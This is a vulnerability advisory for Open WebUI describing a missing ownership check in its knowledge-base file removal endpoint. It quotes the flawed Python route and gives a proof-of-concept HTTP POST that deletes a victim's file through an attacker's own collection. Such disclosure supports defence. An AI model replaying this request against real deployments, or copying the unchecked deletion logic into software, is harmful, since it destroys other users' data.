PT-2026-59338 · Pypi · Open-Webui
Published
2026-07-13
·
Updated
2026-07-13
CVSS v3.1
5.4
Medium
| Vector | AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L |
Summary
An access control check is missing when deleting a file from a knowledge base. The only check being done is that the user has write access to the knowledge base (or is admin), but NOT that the file actually belongs to this knowledge base. It is thus possible to delete arbitrary files from arbitrary knowledge bases (as long as one knows the file id)
Details
The source code at https://github.com/open-webui/open-webui/blob/main/backend/open webui/routers/knowledge.py#L803 does not properly validate that the file being deleted belongs to the current knowledge base:
@router.post("/{id}/file/remove", response model=Optional[KnowledgeFilesResponse])
def remove file from knowledge by id(
id: str,
form data: KnowledgeFileIdForm,
delete file: bool = Query(True),
user=Depends(get verified user),
db: Session = Depends(get session),
):
knowledge = Knowledges.get knowledge by id(id=id, db=db)
[...]
# Note : Access control check on the knowledge base
if (
knowledge.user id != user.id
and not AccessGrants.has access(
user id=user.id,
resource type="knowledge",
resource id=knowledge.id,
permission="write",
db=db,
)
and user.role != "admin"
):
raise HTTPException(
status code=status.HTTP 400 BAD REQUEST,
detail=ERROR MESSAGES.ACCESS PROHIBITED,
)
file = Files.get file by id(form data.file id, db=db)
[...]
# Note : No checks on the file
if delete file:
try:
# Remove the file's collection from vector database
file collection = f"file-{form data.file id}"
if VECTOR DB CLIENT.has collection(collection name=file collection):
VECTOR DB CLIENT.delete collection(collection name=file collection)
except Exception as e:
log.debug("This was most likely caused by bypassing embedding processing")
log.debug(e)
pass
# Delete file from database
Files.delete file by id(form data.file id, db=db)
[...]PoC
Victim has a knowledge base with a file (id: 9db6dcee-bb3b-483e-aaf3-310fda366af1)
Attacker creates their own collection (id: dde9e2b6-21c9-4aa1-a1cf-8cb0e4392f2b)
Attacker deletes the victim file from their own collection:
POST /api/v1/knowledge/dde9e2b6-21c9-4aa1-a1cf-8cb0e4392f2b/file/remove HTTP/1.1
Host: gaius-neo-val.fr.space.corp
Authorization: Bearer eyJhbGciOiJIUzI1[...]nHiaod-3vfNE0
[...]
{"file id":"9db6dcee-bb3b-483e-aaf3-310fda366af1"}
-----
HTTP/1.1 200 OK
[...]The file is then deleted from the victim's knowledge base.
Impact
Arbitrary file deletion
Fix
Found an issue in the description? Have something to add? Feel free to write us 👾
Related Identifiers
Affected Products
Open-Webui